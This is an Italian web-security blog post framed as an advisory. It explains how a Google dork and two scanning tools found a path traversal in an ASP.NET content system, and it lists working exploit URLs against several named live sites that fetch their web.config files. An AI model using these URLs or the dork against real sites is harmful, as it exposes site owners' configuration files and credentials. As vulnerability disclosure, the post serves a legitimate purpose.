cyphersec A blog about Web Application Security and .NET development best practices

Advisory:veltroniperlitalia.it ed altri (Path Traversal)

Cosa succede quando unisci due tool come Google2TXT e TPF?
Succede che continui a recuperare una vasta serie di informazioni che potrebbero essere utili a qualcuno.

Per esempio, utilizzando la dork "inurl:gw/producer/dettaglio.aspx?" Google2TXT restituisce 28 risultati. Successivamente, dopo aver filtrato i risultati ed averli passati a PTF (test mode), vengono rilevate valide le seguenti chiamate: 

   2: http://www.axia.org/gw/producer/index.aspx?t=/gw/producer/dettaglio.aspx

   3: http://www.nessuno.tv/gw/producer/index.aspx?t=/web.config

   5: http://www.veltroniperlitalia.it/gw/producer/index.aspx?t=/web.config

   6: http://www.unibasket.it/gw/producer/index.aspx?t=/web.config

   7: http://dev.nessunotv.dol.it/gw/producer/index.aspx?t=/web.config

Giuro che non lo faccio di proposito, ma ogni volta che cerco vulnerabilità salta fuori sempre qualche sito politico.

About Alessio Marziali

Alessio Marziali (MCTS) is a Security Consultant with 10 years of experience developing secure applications with Microsoft .NET in a variety of sectors in UK and Italy. Published technical author with two ASP.NET books currently available for purchase and OWASP Code Crawler Project Leader.